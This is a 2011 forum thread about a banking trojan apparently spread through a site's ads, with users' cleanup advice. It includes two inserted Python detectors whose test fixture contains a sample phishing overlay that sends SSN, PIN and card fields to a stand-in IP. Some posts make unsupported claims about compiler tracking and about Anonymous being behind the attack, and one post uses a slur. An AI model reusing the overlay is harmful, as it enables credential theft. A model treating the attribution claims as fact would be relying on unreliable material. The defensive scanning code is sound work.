Virus at Dtv

Initiate
User avatar
Posts: 572
Joined: Mon Jul 26, 2010 2:48 am
Location: Between hangovers.

Post Fri Dec 09, 2011 6:07 am » by Skydog


So glad I looked in on this thread; seems like all the adverts make this 10 times slower. Loving this site. Why can't I put an avatar up? Seems like all this redirecting and slowness is coming from the ads to me; seems a little bit much to be forced onto an ad site. I'm just saying. I'm in the UK and have had this for a couple of weeks.

Conspirator
User avatar
Posts: 4463
Joined: Thu Nov 05, 2009 6:11 am
Location: Earth

Post Fri Dec 09, 2011 6:14 am » by Shaggietrip


skydog wrote:So glad I looked in on this thread; seems like all the adverts make this 10 times slower. Loving this site. Why can't I put an avatar up? Seems like all this redirecting and slowness is coming from the ads to me; seems a little bit much to be forced onto an ad site. I'm just saying. I'm in the UK and have had this for a couple of weeks.



avatar 4e http://www.disclose.tv/forum/forum-rules-and-terms-of-use-t60332.html

Try AdBlock if on Firefox, or Chrome if I dare say.

Hope it helps


:hiho: to Dtv


:cheers:
Star watchers, Sun, Moon, or just space of interest. https://www.darkskywatcher.com/dsw74.html

Conspirator
User avatar
Posts: 4007
Joined: Wed Feb 16, 2011 9:03 pm

Post Fri Dec 09, 2011 1:04 pm » by Rydher


serendipity wrote:Turns out the problem was deeply hidden trojans. Ones with a very high risk level. Kaspersky is finding them. 4 hour scan but worth it and free. Kudos to Rydher for pointing it out. Y'all better check again with Kaspersky before you end the day. I got infected and didn't even click the link. :look: :flop:


No problem, I didn't click the link either and was infected just as bad. For my personal computer I'm definitely going back to Kaspersky. I'm not really sure why I ever stopped using it, it's always been rock solid.

Super Moderator
User avatar
Posts: 9120
Joined: Fri May 14, 2010 7:03 pm
Location: Inside You.

Post Fri Dec 09, 2011 1:43 pm » by Troll2rocks


I am sorry to be the bearer of bad news but it appears that no matter the link or thread if you logged on in that time frame, you are likely infected.

Go to a previous message I posted on the first page and do as I say, but I am now seriously telling everyone with "confirmed issues and malware" that you need to go into your system restore and remove all backups, "YES ALL OF THEM". You then need to do a system boot scan on high awareness in "no network safe mode"...

This will stop any outbound or inbound connections upon boot-up, and will make it easier for your antivirus to pinpoint and verify inconsistent registry errors. It will also make sure that the rootkits ("which is where those trojans your virus protectors keep finding are coming from") are far more transparent to detection.

It appears that the infection is able to latch into system restore.

WARNING....

Before doing this, you must have "hardcopy" backup(s) of your system at hand, because once you erase system restore, you will not be able to roll back to a previous date of your system. Should the boot scan detect a problem with your system32 and give you no option but ignore or delete (meaning it cannot be fixed), once removed (the only real option unless you want to live with the infection) you may not be able to boot up again, depending on the location of the infection (unfortunately it is usually within a directory that is vital).

Backing up your system now, before you do as I say above, may be wise, but again, depending on where the root cause of infection is, it will only back up the infection too, meaning that once you reinstall Windows on your computer, it will just put the infection back into your computer.

As I said before, that was a nasty little program, from which there is very little adequate defence on the home front.

I would advise Lukas in DTV 2.0 to increase security. Even though all security these days is a joke, the model DTV is using is pretty poor, to say the least; God knows how many thousands of people have been infected.

Anyhow, sorry to break the bad news, but you need to do as I say. Ignore me and you may think everything is fine for a week (or however long it takes for the infection to remotely download and install malware your system can no longer fight).

PS if you do leave it and it reaches your motherboard and vital systems, I would have no other way as to describe you as being "fucked".
Censorship debunking & disinformation, it's all in a day's work.

Super Moderator
User avatar
Posts: 9120
Joined: Fri May 14, 2010 7:03 pm
Location: Inside You.

Post Fri Dec 09, 2011 2:37 pm » by Troll2rocks


2020vision wrote:
troll2rocks wrote:PS if you do leave it and it reaches your motherboard and vital systems, I would have no other way as to describe you as being "fucked".


Since when do viruses or malware affect motherboards? In all the years as an electronics technician I have never seen this; they may in some 'very rare' cases corrupt the BIOS, granted, but not main system boards.



Oh, you know what I mean. I do not mean take over hardware like a ghost, lmao. I mean specifically what you stated; my fault for not specifying. I meant the systems vital to keep your computer working and functional.

Not circuit boards lol

:cheers:
Censorship debunking & disinformation, it's all in a day's work.

Conspirator
Posts: 1033
Joined: Thu Feb 04, 2010 11:15 am

Post Fri Dec 09, 2011 4:17 pm » by Chronicnerd


Actually,

I was hit both at work and home...

Unfortunately, there are a few issues here:

1.) It is a ZBOT Trojan... this one comes up as ZBOT!GENY or ZBOTGENY~ or any offshoot from that likeness.
2.) It is *brand new*, as in the binary image of this trojan infection is not known by almost all repositories regarding "digital infections"... well, until yesterday it wasn't.
3.) It is a *SMART* trojan virus...and when I say *SMART*... this was *NOT* some kid or backwoods hacker...this is *VERY* well done...as in the person who implanted this specifically targeted this website and its clients...visitors. (Will go into some of the things I have been tracking since yesterday around 7ish in the morning.)
4.) It dumps user information to some IP addresses that end up in various places located in EUROPE. When I say user information...not this site, folks...and I will get into this in a bit.
5.) It spreads to *known* system executables as well as looks over network drives and tries to identify *known* common executables as well as things like MSI (installer) files and will wrap a *spoof* launch header onto it...so...as an example...you decide to be *smart* and/or were *smart* and had backups of your data and common install files located...oh, say, on a NAS drive...yeah...clean install...you start to install your applications... *pow*...you get it again.

The Nasty Part:
This is a *VERY* sophisticated piece of work. It has several proxy servers that dish up templates for specific types of logins...such as banks...trading accounts (i.e. Fidelity, E*Trade, etc.)... and the like.
When I say *VERY* sophisticated...as an example...if you log in to, say...your online banking (Chase, Bank of America, etc.), it will wait for you to fully log in and then use an IFRAME window (main site goes a little dim) and a window *FORMATTED SPECIFICALLY FOR THE THEME OF THE SITE* will pop up and ask for a BUNCH of information claiming they are the bank and just "tightening up their security".

DO NOT FILL OUT OR GIVE OUT ANY INFORMATION TO ANY POPUP AND/OR OVERLAY WHEN YOU LOGIN TO A SITE THAT FALLS INTO THE ABOVE CATEGORY WITHOUT *FIRST* CALLING THE SERVICE AND READING EXACTLY WHAT IT SAYS TO A REPRESENTATIVE OF SAID SERVICE!!!!

How I caught the binary and the headaches it has caused me in the past 24 hours:
At work I helped design our server architecture (although it isn't what I do specifically) and decided to virtualize everything for many purposes. The primary reason being that it allows for easy backup of the entire OS as a full disk image and you can fully utilize a server by running multiple "virtual servers" on one box. The ancillary but now I am thinking *primary* reason in my book as I move forward...is that in the event some major viral infection took place I could simply restore our images from a day or two prior to the estimated time of infection to be 100% sure.

What I ended up seeing was that the virus had made its way into a good number of one of our file servers that hosted "installation files" for various tools and utilities common to my workplace. My workstation was always running in a virtualized instance with RemoteFX through one of the Hyper-V servers that hosted some virtual workstations...not all people at my workplace had this setup...but luckily the majority of them did not get *hit* as they don't *FREQUENT THIS SITE*... and yes... it came directly from this site.

The virus is more than likely not the owners' fault...per se... as it actually embedded itself inside their ADVERTISING...which belongs to a different group who evidently has *NO CLUE* what they are doing regarding security. Their advertisements *CRAWL* with malware, evidently.

So, long story short, this "trojan virus" will install itself via several different mechanisms, some through exposed codecs...some through the "click here" to continue...some through those annoying "invisible" popups that were offscreen and would start playing some form of "movie"...I think you guys know what I am talking about...you would click a couple of posts in new tabs...and then start hearing a movie playing...like an advertisement...but see no advertisement. I had noticed this a while back and just thought: "what a crappy advertisement group"...and figured it was a bug.

Well, it wasn't... it was evidently a group of hackers (which I will tell you who I think they are in a second) that were "testing the waters"... seeing if anyone at the advertisement group would notice...and obviously they didn't...and why I am saying they are *CLUELESS* or just don't care (again...not the site owners' but the advertisement group this site was using...which...if you notice...isn't it odd the advertisements have just "stopped"?).

So...what I did was create a "virtual environment" that was closed off from all resources and reloaded an image prior to the day I got infected... which was Wednesday of this week (the 7th). Sure enough the little binary went to work and was busy infecting all sorts of things... I managed to get several samples of the binary and have submitted them to Microsoft's viral infection group (MS Security Essentials and/or MS End Point Security division) who are updating their tables as well as moving this infection up to the proper groups/authorities that are looking into the sources of where this thing came from.

Anyway, I have the convenience of having multiple pipes coming into my work place...so...I decided to play "follow the white rabbit"... and traced their packets through a packet sniffer and Microsoft Forefront Threat Management Gateway to figure out who I was going to have to kill for trying to screw with not only my personal account information... but my company's information (we deal with specific types of data that require relatively high levels of security)...

I am sure you want IPs... but as I said I have moved this whole thing to the "proper groups" who are now looking into the folks responsible for doing this shit. What I will say is that it looks like the "dumps" of information as well as the "pulls" have come from several locations which appear to be forms of "proxy" servers that then hop to another server which hosts the "fake info popup pages". The cute part was that I managed to enter information that *wasn't* correct for one of the services that I use for financial purposes (not saying which because some of the folks who did this actually have accounts here on this very site). The data was dumped...yet again...to a EUROPE location...but this was more "direct"...although I am sure it is a pansy/temp server that was compromised by this group as they seem to love to piggyback on other people's shit.

Either case, this looks to be the work of... you ready for this?

Anonymous

Yeah... evidently there were some people who didn't like what was being said on this site... and they decided to "deep six" it... as in sic a bunch of hardcore hackers on it to not just "hack" the site... but screw with everyone on it...as in...make everyone's life miserable...empty bank accounts...pull funds from IRAs or the like... and put an end to not only this site....but most everyone on the site...as in leave a bad taste in everyone's mouth enough to make them "think twice" before being part of a community of this "type"...

Either case, this was something that looks to be started back around June of this year. The images/binaries were actually compiled using a specific compiler that, unknown to many people, actually logs a hash key into the image in order to track things just like this. So, someone somewhere will be getting a nice visit by some friendly men to talk to them about their "SkillZ0rZ"... and then putting them in a very small room for a decade or two to think about what they have done. Information logged was their originating IP, provider IP, machine ID, as well as other information that will make it pretty simple to figure out who the person was who actually hit the "compile" button while constructing this shit.

Either case, I would recommend backing up only your DATA... completely erasing your hard drive... better yet...buy a new hard drive... re-install your OS... re-download any software you might use (i.e. don't even think about using those "backups" of things like Firefox install or the like... more than likely if it was on a NAS and you are in a small network environment...and you have the NAS drive mapped and it was on between the 6th and today....and you hit this site....both it and your computer are infected).

If you think you got "tight security"...then I would highly recommend downloading MICROSOFT SECURITY ESSENTIALS. I will not post a link here, because it just doesn't make sense...Google it...verify you are downloading DIRECTLY FROM MICROSOFT...and do a FULL system scan....which will take a while.

So... this would be the steps:
1.) Download Microsoft Security Essentials FROM MICROSOFT...no CNET...no other location!
2.) Install it and let it update... you should get a relatively new update (like yesterday or it will be out today or tomorrow) which will be able to fully identify this virus/trojan.
3.) Once MS Security Essentials has updated...unplug your computer from the network.
4.) Run a full scan on your computer...depending upon how many files...this could take upwards of 10-15 hours...again...depends upon how many files... if you have less than 1TB then it shouldn't take more than a few hours.
5.) If you see something like: ZBOT GEN Y (with any number of characters in between) then you got hit... and it would be *highly* recommended that you pretty much clean out both your computer and NAS.

I am not saying just go delete everything.
I am not saying that everyone got infected.
If you are not sure what to do and you are infected... turn your computer off... and either find a friend or family member who knows more about this stuff and can help you only extract DATA...from the drive...
I only *suggest* getting a new drive because it does appear to have the footprint of a "rootkit" trojan and does look like it can open ports typical for both sending and receiving information.

First step... Security Essentials... most other virus detection software will not see this for a while...and this might very well be a "targeted" virus/trojan (as I suspect)... so it might not be "widespread" and not on many other virus protection groups' list as having to be "immediately updated"... MS is very aware of this specific event and ~should~ be updating their MSE virus/malware definitions.

Either case, I cannot say what the owners of the site will be doing regarding their advertisements, as this looks to be a directly focused attack on the site using the advertisement group's *POOR* security and evidently *CLUELESS* IT folks...who up until yesterday evening had no idea they had been compromised.

Finally, if you are part of the "scout" group for the Anonymous Tards...you evidently don't realize how many SOFTWARE GIANTS you have pissed off in the past six months...who have already made many adjustments to their compilers...OSs... as well as how information is tagged...

After all... the majority of you guys (Anonymous Tards) are young...don't know that hacking existed before you were born...and there are *some* of us "old guys" who actually helped write the book on hacking.

I hear jail isn't so bad...well... here in America that is... not sure how some of those European countries handle jails...but hey... once you are in jail... you truly will just be some "anonymous" person caught up in a political game...which is the difference between yourselves and say...some of us "older" folks...who have the wisdom to know the difference between right and wrong.

Cheers!

-CN
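A defender-side illustration of the overlay behaviour described in the post above (a foreign IFRAME and a themed form asking for extra details after login). This is an added example, not code from the thread or from any product named in it: it scans the HTML a proxy or sandbox captured during a test login and flags iframes or forms that point outside the bank's own origin, plus form fields a login page has no business asking for. The origin `https://online.bank.example`, the address `203.0.113.10`, the page content and the `SENSITIVE_FIELDS` list are constructed assumptions, not values from the thread.

```python
"""Flag web-inject indicators in a captured banking login response.

Added example (not from the forum thread). Given the raw HTML captured when a
test account logged in, report:
  * <iframe> / <form> elements whose src / action point outside the expected origin,
  * form fields that a login or landing page should never request.
All sample values below are constructed for illustration.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed list of field names that legitimately never appear on a login page.
SENSITIVE_FIELDS = {"ssn", "pin", "atm_pin", "card_number", "cardnumber",
                    "cvv", "mothers_maiden_name", "dob"}


class InjectScanner(HTMLParser):
    """Walks the document and collects (indicator, detail) findings."""

    def __init__(self, expected_origin):
        super().__init__()
        self.expected_host = urlparse(expected_origin).hostname
        self.findings = []
        self._form_stack = []  # actions of the forms currently open

    def _foreign(self, url):
        # Relative URLs have no host and therefore stay same-origin.
        host = urlparse(url).hostname
        return host is not None and host != self.expected_host

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            src = a.get("src") or ""
            if self._foreign(src):
                self.findings.append(("foreign_iframe", src))
        elif tag == "form":
            action = a.get("action") or ""
            self._form_stack.append(action)
            if self._foreign(action):
                self.findings.append(("foreign_form_action", action))
        elif tag == "input" and self._form_stack:
            # Normalise "card-number" / "Card_Number" to one spelling before lookup.
            name = (a.get("name") or "").lower().replace("-", "_")
            if name in SENSITIVE_FIELDS:
                self.findings.append(("sensitive_field", name))

    def handle_endtag(self, tag):
        if tag == "form" and self._form_stack:
            self._form_stack.pop()


def scan_response(html, expected_origin):
    """Return the list of indicators found in one captured response."""
    scanner = InjectScanner(expected_origin)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


def is_suspicious(html, expected_origin):
    return bool(scan_response(html, expected_origin))


# Constructed samples: a plain login page, and the same page with an injected overlay.
ORIGIN = "https://online.bank.example"
CLEAN_PAGE = """<html><body>
<form action="/login" method="post">
  <input name="username"><input name="password" type="password">
</form></body></html>"""
INJECTED_PAGE = CLEAN_PAGE.replace("</body>", """
<div class="overlay">
  <iframe src="https://203.0.113.10/tpl/login-overlay.html"></iframe>
  <form action="https://203.0.113.10/collect" method="post">
    <input name="ssn"><input name="atm-pin"><input name="card-number">
  </form>
</div></body>""")

if __name__ == "__main__":
    for label, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        print(label, scan_response(page, ORIGIN))
```

Because a Zeus-style inject rewrites the response inside the victim's browser, the bank's server never sees the overlay; this check is meant for a capture taken on the client side (a debugging proxy or a sandboxed test login), where the injected markup is visible.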
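Point 5 of the post above, and the later advice not to reuse installers from a NAS that was mapped during the infection window, describe installers on a share being wrapped in a new launch header. An added example (not code from the thread): a hash manifest recorded from a known-good copy of the share is compared against the share's current contents, so a rebuild is fed only installers that still match. The directory layout, the file bytes, and the `INSTALLER_SUFFIXES` list are constructed assumptions; in practice the manifest would come from a backup taken before the incident or from the vendor's published hashes.

```python
"""Detect tampered installers on a shared drive before reusing them in a rebuild.

Added example (not from the forum thread). A manifest of SHA-256 hashes recorded
from a known-clean state is compared with the share as it is now; anything
modified, missing or newly appeared is reported rather than run.
The temp-directory contents below are constructed for illustration.
"""
import hashlib
import json
import os
import tempfile
from pathlib import Path

# Assumed set of file types worth tracking on an installer share.
INSTALLER_SUFFIXES = {".exe", ".msi", ".dll"}
CHUNK = 1 << 20


def sha256_file(path):
    """Stream the file through SHA-256 so large installers do not fill memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(CHUNK), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """Record hash and size of every installer under root (run on a known-clean share)."""
    root = Path(root)
    manifest = {}
    for p in sorted(root.rglob("*")):
        if p.is_file() and p.suffix.lower() in INSTALLER_SUFFIXES:
            key = str(p.relative_to(root)).replace(os.sep, "/")
            manifest[key] = {"sha256": sha256_file(p), "size": p.stat().st_size}
    return manifest


def verify_share(root, manifest):
    """Compare the share's current contents with a saved manifest."""
    current = build_manifest(root)
    report = {"ok": [], "modified": [], "missing": [], "unexpected": []}
    for name, rec in manifest.items():
        cur = current.get(name)
        if cur is None:
            report["missing"].append(name)
        elif cur["sha256"] != rec["sha256"]:
            report["modified"].append(name)
        else:
            report["ok"].append(name)
    for name in current:
        if name not in manifest:
            report["unexpected"].append(name)
    return report


def demo():
    """Build a constructed share, record its manifest, then simulate tampering."""
    with tempfile.TemporaryDirectory() as d:
        share = Path(d)
        (share / "tools").mkdir()
        editor = share / "tools" / "editor-setup.exe"
        editor.write_bytes(b"MZ" + b"\x00" * 64 + b"clean installer body")
        (share / "tools" / "agent.msi").write_bytes(b"\xd0\xcf\x11\xe0" + b"msi body")
        (share / "README.txt").write_text("not an installer, ignored by the manifest")
        manifest = build_manifest(share)  # would have been saved before the incident

        # Simulate what the post describes: a new loader wrapped around an installer,
        # plus an executable that was never on the share.
        editor.write_bytes(b"MZ" + b"\x90" * 32 + editor.read_bytes())
        (share / "tools" / "extra.exe").write_bytes(b"MZ" + b"new file")
        return verify_share(share, manifest)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Only files in the `ok` list are candidates for reuse; a changed size with an unchanged hash cannot happen, but a changed hash with the same size can, which is why the hash, not the size, decides.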

Conspirator
Posts: 1033
Joined: Thu Feb 04, 2010 11:15 am

Post Fri Dec 09, 2011 4:42 pm » by Chronicnerd


Looks like they are on it (man I like Microsoft...they really are cool peeps):
Definitions Created on: 12/9/2011 at 4:51 AM
Virus definition version: 1.117.718.0
Spyware definition version: 1.117.718.0

So, Microsoft Security Essentials looks to have the updated definitions already available....

It's free... Microsoft owns the OS...and they have what I would say are the best, if not the very top of the best, tech guys on this planet... IT to programming... and they work 24 hours a day (rotating between offices around the globe)...

Again...not posting a link here just for security purposes... download directly from Microsoft...

Cheers,

-CN

Conspirator
User avatar
Posts: 8096
Joined: Fri Mar 12, 2010 9:08 am
Location: Next door

Post Sat Dec 10, 2011 2:09 am » by Malogg


Noticed a virus on DTV: for the last 3 or 4 months a virus would pop up every now and then.

Only solution once infected is to wipe the hard drive, i.e. reformat and slap a fresh operating system in. Just a complete nightmare installing drivers again if it is a fecken laptop like mine, a Sony Vaio FW21E, which you get no drivers with; I had to hunt online for a disc with the original drivers, but still the BD-ROM driver is a dud :(

Got a new sat Toshiba laptop that ain't getting connected to the net, or dodgy external drives or copied discs jizzed into it, as I'm using it for writing music, and I know how easy it is to get a damn virus. Had loads in the past, and the only true way to kill 'em is to wipe the slate clean and start again.

Anyone that attacks folks with a fecking virus is a faggot that I only wish KARMA a zillion fold on, and bad shits for a week or two! :P
HAHA

